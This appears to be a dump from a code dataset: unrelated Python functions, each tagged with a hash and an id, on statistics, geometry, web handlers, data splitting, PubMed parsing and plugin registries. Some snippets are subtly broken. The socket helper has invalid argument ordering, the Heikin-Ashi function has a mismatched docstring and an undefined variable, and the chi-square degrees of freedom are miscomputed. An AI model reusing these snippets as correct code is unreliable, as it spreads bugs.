def chi2_test_independence(prediction_files: list, confidence_level: float): """Given a list of prediction files and a required confidence level, return whether the sentiment probability is independent on which prediction file it comes from. Returns True if the sentiment probability is independent of source.""" df = generate_sentiment_counts_multiple_files(prediction_files) observed = df[:-1].drop(columns='row_sum') expected = np.outer(df['row_sum'][:-1], df.loc['col_sum'][:-1]) / df.loc['col_sum']['row_sum'] expected = pd.DataFrame(expected) expected.columns = df.columns[:-1] expected.index = df.index[:-1] chi2_stats = ((observed - expected)**2 / expected).sum().sum() degs_of_freedom = len(observed) * len(observed.iloc[0]) critical_value = chi2.ppf(q=confidence_level, df=degs_of_freedom) p_value = 1 - chi2.cdf(x=chi2_stats, df=degs_of_freedom) LOGGER.info( f"chi2_stats = {chi2_stats}, critical_value = {critical_value}, p_value = {p_value:.10f}" ) return p_value > (1 - confidence_level)
870a91afa202b19398c620756492bd5297c4eb69
3,652,473
import json async def insert(cls:"PhaazeDatabase", WebRequest:Request, DBReq:DBRequest) -> Response: """ Used to insert a new entry into a existing container """ # prepare request for a valid insert try: DBInsertRequest:InsertRequest = InsertRequest(DBReq) return await performInsert(cls, DBInsertRequest) except (MissingIntoField, InvalidContent, ContainerNotFound, ContainerBroken, SysLoadError, SysStoreError) as e: res = dict( code = e.code, status = e.status, msg = e.msg() ) return cls.response(status=e.code, body=json.dumps(res)) except Exception as ex: return await cls.criticalError(ex)
20772f847137422a1da227da38946c9b1a01106a
3,652,476
def eulerAngleXYZ(t123, unit=np.pi/180., dtype=np.float32): """ :: In [14]: eulerAngleXYZ([45,0,0]) Out[14]: array([[ 1. , 0. , 0. , 0. ], [-0. , 0.7071, 0.7071, 0. ], [ 0. , -0.7071, 0.7071, 0. ], [ 0. , 0. , 0. , 1. ]], dtype=float32) In [15]: eulerAngleXYZ([0,45,0]) Out[15]: array([[ 0.7071, 0. , -0.7071, 0. ], [-0. , 1. , 0. , 0. ], [ 0.7071, -0. , 0.7071, 0. ], [ 0. , 0. , 0. , 1. ]], dtype=float32) In [16]: eulerAngleXYZ([0,0,45]) Out[16]: array([[ 0.7071, 0.7071, 0. , 0. ], [-0.7071, 0.7071, 0. , 0. ], [ 0. , -0. , 1. , 0. ], [ 0. , 0. , 0. , 1. ]], dtype=float32) In [11]: extractEulerAnglesXYZ(eulerAngleXYZ([45,0,0])) Out[11]: array([ 45., 0., 0.], dtype=float32) In [12]: extractEulerAnglesXYZ(eulerAngleXYZ([0,45,0])) Out[12]: array([ 0., 45., -0.], dtype=float32) In [13]: extractEulerAnglesXYZ(eulerAngleXYZ([0,0,45])) Out[13]: array([ 0., 0., 45.], dtype=float32) https://github.com/g-truc/glm/blob/master/glm/gtx/euler_angles.inl :: template<typename T> GLM_FUNC_QUALIFIER mat<4, 4, T, defaultp> eulerAngleXYZ ( T const & t1, T const & t2, T const & t3 ) { T c1 = glm::cos(-t1); T c2 = glm::cos(-t2); T c3 = glm::cos(-t3); T s1 = glm::sin(-t1); T s2 = glm::sin(-t2); T s3 = glm::sin(-t3); mat<4, 4, T, defaultp> Result; Result[0][0] = c2 * c3; Result[0][1] =-c1 * s3 + s1 * s2 * c3; Result[0][2] = s1 * s3 + c1 * s2 * c3; Result[0][3] = static_cast<T>(0); Result[1][0] = c2 * s3; Result[1][1] = c1 * c3 + s1 * s2 * s3; Result[1][2] =-s1 * c3 + c1 * s2 * s3; Result[1][3] = static_cast<T>(0); Result[2][0] =-s2; Result[2][1] = s1 * c2; Result[2][2] = c1 * c2; Result[2][3] = static_cast<T>(0); Result[3][0] = static_cast<T>(0); Result[3][1] = static_cast<T>(0); Result[3][2] = static_cast<T>(0); Result[3][3] = static_cast<T>(1); return Result; } """ a = np.asarray(t123, dtype=dtype) a *= unit t1 = a[0] t2 = a[1] t3 = a[2] c1 = np.cos(-t1); c2 = np.cos(-t2); c3 = np.cos(-t3); s1 = np.sin(-t1); s2 = np.sin(-t2); s3 = np.sin(-t3); Result = np.eye(4, dtype=dtype); Result[0][0] = c2 * c3; Result[0][1] =-c1 * s3 + s1 * s2 * c3; Result[0][2] = s1 * s3 + c1 * s2 * c3; Result[0][3] = 0; Result[1][0] = c2 * s3; Result[1][1] = c1 * c3 + s1 * s2 * s3; Result[1][2] =-s1 * c3 + c1 * s2 * s3; Result[1][3] = 0; Result[2][0] =-s2; Result[2][1] = s1 * c2; Result[2][2] = c1 * c2; Result[2][3] = 0; Result[3][0] = 0; Result[3][1] = 0; Result[3][2] = 0; Result[3][3] = 1; return Result;
a0e6f0b58c1510aa27cb5064ddebd40b3688de37
3,652,477
def is_on_cooldown(data): """ Checks to see if user is on cooldown. Based on Castorr91's Gamble""" # check if command is on cooldown cooldown = Parent.IsOnCooldown(ScriptName, CGSettings.Command) user_cool_down = Parent.IsOnUserCooldown(ScriptName, CGSettings.Command, data.User) caster = Parent.HasPermission(data.User, "Caster", "") if (cooldown or user_cool_down) and caster is False and not CGSettings.CasterCD: if CGSettings.UseCD: cooldownDuration = Parent.GetCooldownDuration(ScriptName, CGSettings.Command) userCDD = Parent.GetUserCooldownDuration(ScriptName, CGSettings.Command, data.User) if cooldownDuration > userCDD: m_CooldownRemaining = cooldownDuration message = CGSettings.OnCoolDown.format(data.UserName, m_CooldownRemaining) SendResp(data, CGSettings.Usage, message) else: m_CooldownRemaining = userCDD message = CGSettings.OnUserCoolDown.format(data.UserName, m_CooldownRemaining) SendResp(data, CGSettings.Usage, message) return True elif (cooldown or user_cool_down) and CGSettings.CasterCD: if CGSettings.UseCD: cooldownDuration = Parent.GetCooldownDuration(ScriptName, CGSettings.Command) userCDD = Parent.GetUserCooldownDuration(ScriptName, CGSettings.Command, data.User) if cooldownDuration > userCDD: m_CooldownRemaining = cooldownDuration message = CGSettings.OnCoolDown.format(data.UserName, m_CooldownRemaining) SendResp(data, CGSettings.Usage, message) else: m_CooldownRemaining = userCDD message = CGSettings.OnUserCoolDown.format(data.UserName, m_CooldownRemaining) SendResp(data, CGSettings.Usage, message) return True return False
b15180c7e890298cc1949ddfb199b42156ee66d9
3,652,478
def human_readable_size(num): """ To show size as 100K, 100M, 10G instead of showing in bytes. """ for s in reversed(SYMBOLS): power = SYMBOLS.index(s)+1 if num >= 1024**power: value = float(num) / (1024**power) return '%.1f%s' % (value, s) # if size less than 1024 or human readable not required return '%s' % num
3c4ad148bc717b7058e90b3abf5efd67f6d92651
3,652,479
def sum_2_level_dict(two_level_dict): """Sum all entries in a two level dict Parameters ---------- two_level_dict : dict Nested dict Returns ------- tot_sum : float Number of all entries in nested dict """ '''tot_sum = 0 for i in two_level_dict: for j in two_level_dict[i]: tot_sum += two_level_dict[i][j] ''' tot_sum = 0 for _, j in two_level_dict.items(): tot_sum += sum(j.values()) return tot_sum
6b5be015fb84fa20006c11e9a3e0f094a6761e74
3,652,480
def q_values_from_q_func(q_func, num_grid_cells, state_bounds, action_n): """Computes q value tensor from a q value function Args: q_func (funct): function from state to q value num_grid_cells (int): number of grid_cells for resulting q value tensor state_bounds (list of tuples): state bounds for resulting q value tensor action_n (int): number of actions in action space Returns: np.ndarray: q value tensor """ q_values = np.zeros(num_grid_cells + (action_n,)) it = np.nditer(q_values, flags=['multi_index']) while not it.finished: qs = q_func( index_to_state( num_grid_cells, state_bounds=state_bounds, discrete=it.multi_index[:-1] ) ) q_values[it.multi_index] = qs[0] it.iternext() return q_values
2378f2021e16678b75622a23c9e57ba6b2f6d1d7
3,652,482
import re def check_ip(ip): """ Check whether the IP is valid or not. Args: IP (str): IP to check Raises: None Returns: bool: True if valid, else False """ ip = ip.strip() if re.match(r'^(?:(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])' '(\.(?!$)|$)){4}$', ip): return True else: return False
2ff9a9262e46546fcb8854edee4b3b18ae1e2cc4
3,652,484
from typing import Iterator from typing import Optional def _stream_lines(blob: bytes) -> Iterator[bytes]: """ Split bytes into lines (newline (\\n) character) on demand. >>> iter = _stream_lines(b"foo\\nbar\\n") >>> next(iter) b'foo' >>> next(iter) b'bar' >>> next(iter) Traceback (most recent call last): ... StopIteration >>> iter = _stream_lines(b"\\x00") >>> next(iter) b'\\x00' :param blob: the bytes to split. :return: a generated list of lines. """ start = 0 def _index(needle: bytes) -> Optional[int]: try: return blob.index(needle, start) except ValueError: return None line_index = _index(b"\n") while line_index is not None: yield blob[start:line_index] start = line_index + 1 line_index = _index(b"\n") # Deal with blobs that do not end in a newline. if start < len(blob): yield blob[start:]
8a166af1f765ca9eb70728d4c4bb21c00d7ddbf8
3,652,485
from typing import Dict async def fetch_all_organizations(session: ClientSession) -> Dict: """Fetch all organizations from organization-catalog.""" url = f"{Config.org_cat_uri()}/organizations" org_list = await fetch_json_data(url, None, session) return {org["organizationId"]: org for org in org_list} if org_list else dict()
bf033ed85671214d9282acba3361fbdc1e6d4f6e
3,652,486
from typing import Optional import tqdm def create_splits_random(df: pd.DataFrame, val_frac: float, test_frac: float = 0., test_split: Optional[set[tuple[str, str]]] = None, ) -> dict[str, list[tuple[str, str]]]: """ Args: df: pd.DataFrame, contains columns ['dataset', 'location', 'label'] each row is a single image assumes each image is assigned exactly 1 label val_frac: float, desired fraction of dataset to use for val set test_frac: float, desired fraction of dataset to use for test set, must be 0 if test_split is given test_split: optional set of (dataset, location) tuples to use as test split Returns: dict, keys are ['train', 'val', 'test'], values are lists of locs, where each loc is a tuple (dataset, location) """ if test_split is not None: assert test_frac == 0 train_frac = 1. - val_frac - test_frac targets = {'train': train_frac, 'val': val_frac, 'test': test_frac} # merge dataset and location into a single string '<dataset>/<location>' df['dataset_location'] = df['dataset'] + '/' + df['location'] # create DataFrame of counts. rows = locations, columns = labels loc_label_counts = (df.groupby(['label', 'dataset_location']).size() .unstack('label', fill_value=0)) num_locs = len(loc_label_counts) # label_count: label => number of examples # loc_count: label => number of locs containing that label label_count = loc_label_counts.sum() loc_count = (loc_label_counts > 0).sum() best_score = np.inf # lower is better best_splits = None for _ in tqdm(range(10_000)): # generate a new split num_train = int(num_locs * (train_frac + np.random.uniform(-.03, .03))) if test_frac > 0: num_val = int(num_locs * (val_frac + np.random.uniform(-.03, .03))) else: num_val = num_locs - num_train permuted_locs = loc_label_counts.index[np.random.permutation(num_locs)] split_to_locs = {'train': permuted_locs[:num_train], 'val': permuted_locs[num_train:num_train + num_val]} if test_frac > 0: split_to_locs['test'] = permuted_locs[num_train + num_val:] # score the split score = 0. for split, locs in split_to_locs.items(): split_df = loc_label_counts.loc[locs] target = targets[split] # SSE for # of images per label (with 2x weight) crop_frac = split_df.sum() / label_count score += 2 * ((crop_frac - target) ** 2).sum() # SSE for # of locs per label loc_frac = (split_df > 0).sum() / loc_count score += ((loc_frac - target) ** 2).sum() if score < best_score: tqdm.write(f'New lowest score: {score}') best_score = score best_splits = split_to_locs assert best_splits is not None split_to_locs = { s: sorted(locs.map(lambda x: tuple(x.split('/', maxsplit=1)))) for s, locs in best_splits.items() } if test_split is not None: split_to_locs['test'] = test_split return split_to_locs
b8410d8672d11c8133b7d6d8dcdead46e668b3aa
3,652,487
def ha_close(close,high,low,open, n=2, fillna=False): """Relative Strength Index (RSI) Compares the magnitude of recent gains and losses over a specified time period to measure speed and change of price movements of a security. It is primarily used to attempt to identify overbought or oversold conditions in the trading of an asset. https://www.investopedia.com/terms/r/rsi.asp Args: close(pandas.Series): dataset 'Close' column. n(int): n period. fillna(bool): if True, fill nan values. Returns: pandas.Series: New feature generated. """ indicator = Heikin_Ashi(close=df[close],high=df[high],low=df[low],open=df[open],n=2,fillna = fillna) return indicator.ha_close()
655ce9be20f56a22cbe32ed0eaf7615d2b891577
3,652,488
def PLUGIN_ENTRY(): """ Required plugin entry point for IDAPython Plugins. """ return funcref_t()
5c669321d8fc890b8b352e4041dc75773d191664
3,652,489
def chao1_var_no_doubletons(singles, chao1): """Calculates chao1 variance in absence of doubletons. From EstimateS manual, equation 7. chao1 is the estimate of the mean of Chao1 from the same dataset. """ s = float(singles) return s*(s-1)/2 + s*(2*s-1)**2/4 - s**4/(4*chao1)
6b93743a35c70c9ed5b9f3fc9bece1e9363c5802
3,652,490
def inBarrel(chain, index): """ Establish if the outer hit of a muon is in the barrel region. """ if abs(chain.muon_outerPositionz[index]) < 108: return True
9cbc5dad868d6e0ca221524ef8fc5ed5501adaa4
3,652,491
from typing import Union from typing import Callable from typing import Optional from typing import Any def text(message: Text, default: Text = "", validate: Union[Validator, Callable[[Text], bool], None] = None, # noqa qmark: Text = DEFAULT_QUESTION_PREFIX, style: Optional[Style] = None, path_autocomplete=False, exec_autocomplete=False, custom_autocomplete=None, ** kwargs: Any) -> Question: """Prompt the user to enter a free text message. This question type can be used to prompt the user for some text input. Args: message: Question text default: Default value will be returned if the user just hits enter. validate: Require the entered value to pass a validation. The value can not be submited until the validator accepts it (e.g. to check minimum password length). This can either be a function accepting the input and returning a boolean, or an class reference to a subclass of the prompt toolkit Validator class. qmark: Question prefix displayed in front of the question. By default this is a `?` style: A custom color and style for the question parts. You can configure colors as well as font types for different elements. Returns: Question: Question instance, ready to be prompted (using `.ask()`). """ merged_style = merge_styles([DEFAULT_STYLE, style]) validator = build_validator(validate) def get_prompt_tokens(): return [("class:qmark", qmark), ("class:question", ' {} '.format(message))] promptArgs = dict({ 'style': merged_style, 'validator': validator, 'complete_style': CompleteStyle.READLINE_LIKE, }) if path_autocomplete: promptArgs['completer'] = PathCompleter( expanduser=True, delimiters=' \t\n;,') elif exec_autocomplete: promptArgs['completer'] = ExecutableCompleter(delimiters=' \t\n;,') elif custom_autocomplete is not None and len(custom_autocomplete): promptArgs['completer'] = WordCompleter( custom_autocomplete, ignore_case=True, sentence=True) p = PromptSession(get_prompt_tokens, **promptArgs, **kwargs) p.default_buffer.reset(Document(default)) return Question(p.app)
74a79a0ce10503cf10841e8370de870c7e42f8e9
3,652,493
def nav_bar(context): """ Define an active tab for the navigation bar """ home_active = '' about_active = '' detail_active = '' list_active = '' logout_active = '' signup_active = '' login_active = '' friends_active = '' snippets_active = '' request = context['request'] url_name = resolve(request.path_info).url_name if url_name == 'home': home_active = 'active' elif url_name == 'about': about_active = 'active' elif url_name == 'detail': detail_active = 'active' elif url_name == 'list': list_active = 'active' elif url_name == 'friends': friends_active = 'active' elif url_name == 'account_logout': logout_active = 'active' elif url_name == 'account_signup': signup_active = 'active' elif url_name == 'account_login': login_active = 'active' elif url_name == 'snippets' or url_name == 'snippet': snippets_active = 'active' return { 'request': request, 'home_active': home_active, 'about_active': about_active, 'detail_active': detail_active, 'list_active': list_active, 'friends_active': friends_active, 'logout_active': logout_active, 'signup_active': signup_active, 'login_active': login_active, 'snippets_active': snippets_active, }
77b5a8bb367228cc31a0f2454e494d97a5e2b411
3,652,494
def setup_models(basedir, name, lc=True): """ Setup model container for simulation Parameters ---------- basedir : string Base directory name : string Name of source component Returns ------- models : `~gammalib.GModels()` Model container """ # Initialise model container models = gammalib.GModels() # Extract binary component binaries = gammalib.GModels(basedir+'/1dc/models/model_galactic_binaries.xml') binary = binaries[name] # Optionally remove lightcurve if not lc: binary.temporal(gammalib.GModelTemporalConst()) # Append binary to model container models.append(binary) # Append background model to container models.extend(gammalib.GModels(basedir+'/1dc/models/model_bkg.xml')) # Return model container return models
8b8db045d5c7b669f579a8f3b74abe204c82c285
3,652,495
def create_csm(image): """ Given an image file create a Community Sensor Model. Parameters ---------- image : str The image filename to create a CSM for Returns ------- model : object A CSM sensor model (or None if no associated model is available.) """ isd = csmapi.Isd(image) plugins = csmapi.Plugin.getList() for plugin in plugins: num_models = plugin.getNumModels() for model_index in range(num_models): model_name = plugin.getModelName(model_index) if plugin.canModelBeConstructedFromISD(isd, model_name): return plugin.constructModelFromISD(isd, model_name)
681c3b5886346e793b26d2e7c801b924ca82b546
3,652,496
def walk(obj, path='', skiphidden=True): """Returns a recursive iterator over all Nodes starting from findnode(obj, path). If skiphidden is True (the default) then structure branches starting with an underscore will be ignored. """ node = findnode(obj, path) return walknode(node, skiphidden)
efd3e10329d7e8832fa33c9425974ea2cd80938c
3,652,497
def to_string(class_name): """ Magic method that is used by the Metaclass created for Itop object. """ string = "%s : { " % type(class_name) for attribute, value in class_name.__dict__.iteritems(): string += "%s : %s, " % (attribute, value) string += "}" return string
a7e155c92c4e62c1f070a474905a7e0c654f45ff
3,652,499
def molefraction_2_pptv(n): """Convert mixing ratio units from mole fraction to parts per thousand by volume (pptv) INPUTS n: mole fraction (moles per mole air) OUTPUTS q: mixing ratio in parts per trillion by volume (pptv) """ # - start with COS mixing ratio n as mole fraction: # (n mol COS) / (mol air) # convert to mixing ratio as volumetric fraction # = (n * 6.023 * 10^23 molecules COS) / (6.023 * 10^23 molecules air) # = (q molecules COS) / (1000 molecules air) # q is mixing ratio in pptv, n is mole fraction # solve for q --> 1000n = q # therefore pptv = 1000 * mole fraction q = 1e3 * n return(q)
a6a26267f45fb70c346e86421c427bd155bfa65a
3,652,501
import warnings def is_valid_y(y, warning=False, throw=False, name=None): """ """ y = np.asarray(y, order='c') valid = True try: if len(y.shape) != 1: if name: raise ValueError(('Condensed distance matrix \'%s\' must ' 'have shape=1 (i.e. be one-dimensional).') % name) else: raise ValueError('Condensed distance matrix must have shape=1 ' '(i.e. be one-dimensional).') n = y.shape[0] d = int(np.ceil(np.sqrt(n * 2))) if (d * (d - 1) / 2) != n: if name: raise ValueError(('Length n of condensed distance matrix ' '\'%s\' must be a binomial coefficient, i.e.' 'there must be a k such that ' '(k \\choose 2)=n)!') % name) else: raise ValueError('Length n of condensed distance matrix must ' 'be a binomial coefficient, i.e. there must ' 'be a k such that (k \\choose 2)=n)!') except Exception as e: if throw: raise if warning: warnings.warn(str(e)) valid = False return valid
6c3f56c8b931b325d521805902b526054f21e22d
3,652,502
import json import yaml def yaml_parse(yamlstr): """Parse a yaml string""" try: # PyYAML doesn't support json as well as it should, so if the input # is actually just json it is better to parse it with the standard # json parser. return json.loads(yamlstr) except ValueError: yaml.SafeLoader.add_multi_constructor( "!", intrinsics_multi_constructor) return yaml.safe_load(yamlstr)
8586e1e39ae9f0933b6552531d72cb3a6516f615
3,652,503
import collections def csl_item_from_pubmed_article(article): """ article is a PubmedArticle xml element tree https://github.com/citation-style-language/schema/blob/master/csl-data.json """ csl_item = collections.OrderedDict() if not article.find("MedlineCitation/Article"): raise NotImplementedError("Unsupported PubMed record: no <Article> element") title = article.findtext("MedlineCitation/Article/ArticleTitle") if title: csl_item["title"] = title volume = article.findtext("MedlineCitation/Article/Journal/JournalIssue/Volume") if volume: csl_item["volume"] = volume issue = article.findtext("MedlineCitation/Article/Journal/JournalIssue/Issue") if issue: csl_item["issue"] = issue page = article.findtext("MedlineCitation/Article/Pagination/MedlinePgn") if page: csl_item["page"] = page journal = article.findtext("MedlineCitation/Article/Journal/Title") if journal: csl_item["container-title"] = journal journal_short = article.findtext("MedlineCitation/Article/Journal/ISOAbbreviation") if journal_short: csl_item["container-title-short"] = journal_short issn = article.findtext("MedlineCitation/Article/Journal/ISSN") if issn: csl_item["ISSN"] = issn date_parts = extract_publication_date_parts(article) if date_parts: csl_item["issued"] = {"date-parts": [date_parts]} authors_csl = list() authors = article.findall("MedlineCitation/Article/AuthorList/Author") for author in authors: author_csl = collections.OrderedDict() given = author.findtext("ForeName") if given: author_csl["given"] = given family = author.findtext("LastName") if family: author_csl["family"] = family authors_csl.append(author_csl) if authors_csl: csl_item["author"] = authors_csl for id_type, key in ("pubmed", "PMID"), ("pmc", "PMCID"), ("doi", "DOI"): xpath = f"PubmedData/ArticleIdList/ArticleId[@IdType='{id_type}']" value = article.findtext(xpath) if value: csl_item[key] = value.lower() if key == "DOI" else value abstract = article.findtext("MedlineCitation/Article/Abstract/AbstractText") if abstract: csl_item["abstract"] = abstract csl_item["URL"] = f"https://www.ncbi.nlm.nih.gov/pubmed/{csl_item['PMID']}" csl_item["type"] = "article-journal" return csl_item
889bb8bbbafd85607936db7caeb33140c4e356fb
3,652,504
def unphase_uvw(ra, dec, uvw): """ Calculate unphased uvws/positions from phased ones in an icrs or gcrs frame. This code expects phased uvws or positions in the same frame that ra/dec are in (e.g. icrs or gcrs) and returns unphased ones in the same frame. Parameters ---------- ra : float Right ascension of phase center. dec : float Declination of phase center. uvw : ndarray of float Phased uvws or positions relative to the array center, shape (Nlocs, 3). Returns ------- unphased_uvws : ndarray of float Unphased uvws or positions relative to the array center, shape (Nlocs, 3). """ if uvw.ndim == 1: uvw = uvw[np.newaxis, :] return _utils._unphase_uvw( np.float64(ra), np.float64(dec), np.ascontiguousarray(uvw, dtype=np.float64), )
a6e3d1371ed612bd1ece08fc6fabd4ee77241603
3,652,506
import uuid def sender_msg_to_array(msg): """ Parse a list argument as returned by L{array_to_msg} function of this module, and returns the numpy array contained in the message body. @param msg: a list as returned by L{array_to_msg} function @rtype: numpy.ndarray @return: The numpy array contained in the message """ [_dtype, _shape, _bin_msg] = msg_to_array(msg[2:]) _uuid = uuid.UUID(bytes=msg[0]) _data_name = msg[1].decode() return (_uuid, _data_name, _dtype, _shape, _bin_msg)
c959a535a4f47c86f9520167fa59dc8eecc70071
3,652,507
def find_shortest_path(node): """Finds shortest path from node to it's neighbors""" next_node,next_min_cost=node.get_min_cost_neighbor() if str(next_node)!=str(node): return find_shortest_path(next_node) else: return node
4fa3979ff665b5cf8df423ff9b3fbaa880d62a73
3,652,508
from .features import Sequence, get_nested_type def cast_array_to_feature(array: pa.Array, feature: "FeatureType", allow_number_to_str=True): """Cast an array to the arrow type that corresponds to the requested feature type. For custom features like Audio or Image, it takes into account the "cast_storage" methods they defined to enable casting from other arrow types. Args: array (pa.Array): the PyArrow array to cast feature (FeatureType): the target feature type allow_number_to_str (bool, default ``True``): Whether to allow casting numbers to strings. Defaults to True. Raises: pa.ArrowInvalidError: if the arrow data casting fails TypeError: if the target type is not supported according, e.g. - if a field is missing = if casting from numbers to strings and allow_number_to_str is False Returns: pa.Array: the casted array """ _c = partial(cast_array_to_feature, allow_number_to_str=allow_number_to_str) if isinstance(array, pa.ExtensionArray): array = array.storage if hasattr(feature, "cast_storage"): return feature.cast_storage(array) elif pa.types.is_struct(array.type): # feature must be a dict or Sequence(subfeatures_dict) if isinstance(feature, Sequence) and isinstance(feature.feature, dict): feature = { name: Sequence(subfeature, length=feature.length) for name, subfeature in feature.feature.items() } if isinstance(feature, dict) and set(field.name for field in array.type) == set(feature): arrays = [_c(array.field(name), subfeature) for name, subfeature in feature.items()] return pa.StructArray.from_arrays(arrays, names=list(feature), mask=array.is_null()) elif pa.types.is_list(array.type): # feature must be either [subfeature] or Sequence(subfeature) if isinstance(feature, list): return pa.ListArray.from_arrays(array.offsets, _c(array.values, feature[0])) elif isinstance(feature, Sequence): if feature.length > -1: if feature.length * len(array) == len(array.values): return pa.FixedSizeListArray.from_arrays(_c(array.values, feature.feature), feature.length) else: return pa.ListArray.from_arrays(array.offsets, _c(array.values, feature.feature)) elif pa.types.is_fixed_size_list(array.type): # feature must be either [subfeature] or Sequence(subfeature) if isinstance(feature, list): return pa.ListArray.from_arrays(array.offsets, _c(array.values, feature[0])) elif isinstance(feature, Sequence): if feature.length > -1: if feature.length * len(array) == len(array.values): return pa.FixedSizeListArray.from_arrays(_c(array.values, feature.feature), feature.length) else: offsets_arr = pa.array(range(len(array) + 1), pa.int32()) return pa.ListArray.from_arrays(offsets_arr, _c(array.values, feature.feature)) if pa.types.is_null(array.type): return array_cast(array, get_nested_type(feature), allow_number_to_str=allow_number_to_str) elif not isinstance(feature, (Sequence, dict, list, tuple)): return array_cast(array, feature(), allow_number_to_str=allow_number_to_str) raise TypeError(f"Couldn't cast array of type\n{array.type}\nto\n{feature}")
28c3275445a79e869b8dfe5ec49522ff10ca6842
3,652,509
def check_key_match(config_name): """ Check key matches @param config_name: Name of WG interface @type config_name: str @return: Return dictionary with status """ data = request.get_json() private_key = data['private_key'] public_key = data['public_key'] return jsonify(f_check_key_match(private_key, public_key, config_name))
00a3e78e403a54b16558e21e2c6d095560f272d0
3,652,510
def delete_user_group(request, group_id, *args, **kwargs): """This one is not really deleting the group object, rather setting the active status to False (delete) which can be later restored (undelete) )""" try: hydroshare.set_group_active_status(request.user, group_id, False) messages.success(request, "Group delete was successful.") except PermissionDenied: messages.error(request, "Group delete errors: You don't have permission to delete" " this group.") return HttpResponseRedirect(request.META['HTTP_REFERER'])
acad59484befdc5448031343aad47989e9c67d64
3,652,511
from typing import List def _generate_room_square(dungen: DungeonGenerator, room_data: RoomConceptData) -> RoomConcept: """ Generate a square-shaped room. """ map_width = dungen.map_data.width map_height = dungen.map_data.height # ensure not bigger than the map room_width = min(dungen.rng.randint(room_data.min_width, room_data.max_width), map_width) room_height = min(dungen.rng.randint(room_data.min_height, room_data.max_height), map_height) # populate area with floor categories tile_categories: List[List[TileCategoryType]] = [] for x in range(room_width): tile_categories.append([]) for y in range(room_height): tile_categories[x].append(TileCategory.FLOOR) # convert to room room = RoomConcept(tile_categories=tile_categories, design="square", key=room_data.key) return room
d147f64aed8491ce9b4714f61b64f971683d913e
3,652,512
def str_is_float(value): """Test if a string can be parsed into a float. :returns: True or False """ try: _ = float(value) return True except ValueError: return False
08f2e30f134479137052fd821e53e050375cd11e
3,652,514
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool: """Set up Ruckus Unleashed from a config entry.""" try: ruckus = await hass.async_add_executor_job( Ruckus, entry.data[CONF_HOST], entry.data[CONF_USERNAME], entry.data[CONF_PASSWORD], ) except ConnectionError as error: raise ConfigEntryNotReady from error coordinator = RuckusUnleashedDataUpdateCoordinator(hass, ruckus=ruckus) await coordinator.async_refresh() if not coordinator.last_update_success: raise ConfigEntryNotReady hass.data[DOMAIN][entry.entry_id] = { COORDINATOR: coordinator, UNDO_UPDATE_LISTENERS: [], } for platform in PLATFORMS: hass.async_create_task( hass.config_entries.async_forward_entry_setup(entry, platform) ) return True
567af55b3f46c2b5e2ef5204dbe85fabb87c9a74
3,652,516
def get_user_plugins_grouped(get_allowed_plugin_uids_func, get_registered_plugins_grouped_func, registry, user, sort_items=True): """Get user plugins grouped. :param callable get_allowed_plugin_uids_func: :param callable get_registered_plugins_grouped_func: :param fobi.base.BaseRegistry registry: Subclass of ``fobi.base.BaseRegistry`` instance. :param django.contrib.auth.models.User user: :param bool sort_items: :return dict: """ ensure_autodiscover() if not RESTRICT_PLUGIN_ACCESS or getattr(user, 'is_superuser', False): return get_registered_plugins_grouped_func() registered_plugins = {} allowed_plugin_uids = get_allowed_plugin_uids_func(user) for uid, plugin in registry._registry.items(): if uid in allowed_plugin_uids: if PY3: plugin_name = force_text(plugin.name, encoding='utf-8') plugin_group = force_text(plugin.group, encoding='utf-8') else: plugin_name = force_text( plugin.name, encoding='utf-8' ).encode('utf-8') plugin_group = force_text( plugin.group, encoding='utf-8' ).encode('utf-8') if plugin_group not in registered_plugins: registered_plugins[plugin_group] = [] registered_plugins[plugin_group].append((uid, plugin_name)) if sort_items: for key, prop in registered_plugins.items(): prop.sort() return registered_plugins
f355738b99f503568a35945e1008f84145569b62
3,652,517
def calc_randnm7(reg_dict, mlx75027): """ Calculate the RANDMN7 register value Parameters ---------- reg_dict : dict The dictionary that contains all the register information mlx75027 : bool Set to True if using the MLX75027 sensor, False if using the MLX75026 sensor. Returns ---------- randnm7 : int The randnm7 register value """ # print("calc_randnm7()") speed = calc_speed(reg_dict, mlx75027) hmax = calc_hmax(reg_dict, mlx75027, speed=speed) pretime_enabled = np.any( reg_dict["Px_PREHEAT"][2] | reg_dict["Px_PREMIX"][2]) if pretime_enabled: px_pretime = calc_pretime(reg_dict, mlx75027) # As noted in 7.12. can be calculated as: 1070 + HMAX * FLOOR( ((Px_PRETIME(in us)−11.13) / HMAX )* 120), with Px_PRETIME >= 11.13 if px_pretime >= 11.13: randnm7 = 1070 + hmax * np.floor(((px_pretime-11.13)/hmax) * 120) else: randnm7 = 1070 else: randnm7 = 1070 return int(randnm7)
898c4662f045fbcbe655870a8d5642de92debcaf
3,652,518
def get_orientation(pose, ori): """Generate an orientation vector from yaw/pitch/roll angles in radians.""" yaw, pitch, roll = pose c1 = np.cos(-yaw) s1 = np.sin(-yaw) c2 = np.cos(-pitch) s2 = np.sin(-pitch) c3 = np.cos(-roll) s3 = np.sin(-roll) Ryaw = np.array([[c1, s1, 0], [-s1, c1, 0], [0, 0, 1]]) Rpitch = np.array([[c2, 0, -s2], [0, 1, 0], [s2, 0, c2]]) Rroll = np.array([[1, 0, 0], [0, c3, s3], [0, -s3, c3]]) R = np.dot(Ryaw, np.dot(Rpitch, Rroll)) n = np.dot(R, ori) return n
d00cc9befde7afd28b66c572116fb1234e109367
3,652,519
import copy def draw_deformation(source_image, grid, grid_size = 12): """ source_image: PIL image object sample_grid: the sampling grid grid_size: the size of drawing grid """ im = copy.deepcopy(source_image) d = ImageDraw.Draw(im) H,W = source_image.size dist =int(H/grid_size) for i in range(grid_size): step = int(dist*i) d.line(list(zip((grid[0,step,:,0].numpy()+1)/2*H, (grid[0,step,:,1].numpy()+1)/2*H)),fill = 255,width=1) d.line(list(zip((grid[0,:,step,0].numpy()+1)/2*H, (grid[0,:,step,1].numpy()+1)/2*H)),fill = 255,width=1) return im
ec9c6b90e89221789ecba55e2c2360ccd24f9c8c
3,652,520
def dial_socket(host='localhost', port): """ Connect to the socket created by the server instance on specified host and port """ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((host, port)) return sock
555c90f05cdf0feda97d5db160dd048542e03376
3,652,521
